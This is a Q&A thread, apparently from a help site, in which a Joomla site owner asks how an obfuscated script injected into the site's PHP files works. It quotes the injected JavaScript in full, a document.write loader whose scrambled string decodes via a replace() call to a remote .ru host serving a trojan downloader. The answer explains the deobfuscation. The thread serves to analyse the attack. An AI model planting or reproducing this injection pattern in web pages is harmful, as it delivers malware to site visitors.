job.answiz.com

How does this mess work?

My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.

My question is, how does this rubbish work? I look at it and I just don't see how this manages to do any harm. What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and, once opened, will freeze up your Acrobat and wreak havoc on your machine. How it does that, I don't know, and I don't care. But how does the following piece of script invoke the download?

<script>/*Exception*/ document.write('<script src='+'h#^([email protected])((t$&@p#:)&/!$/)@d$y#^#[email protected]$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@[email protected]@([email protected]$p(.&@c&)@(o$m)).!$m$)[email protected]([email protected]()s&[email protected]&o$&(u#)$x&&^(i)[email protected]^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&[email protected]&^&l^$(l)&y$(#@[email protected]!((o#d&^.^#)r$#^u!!$:(#@&8#)([email protected]&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&[email protected]!&^m#&/&(s&$(o!f&[email protected]&o!!n)&i$&c!.#^^c)[email protected]@(([email protected]#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^[email protected]$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&[email protected](z(@)^[email protected])c$&o^m)$)^/#$'.replace(/#|$|@|^|&|(|)|!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan

Notice the replace call after the giant messy string: .replace(/#|$|@|^|&|(|)|!/ig, '').

It removes most of the special characters, turning it into a normal URL:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(I manually changed http: to evil:)

Note that the regex could have been simplified to .replace(/[#$@^&()!]/ig, '')

If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.

I requested that page in Fiddler, and it had no content.
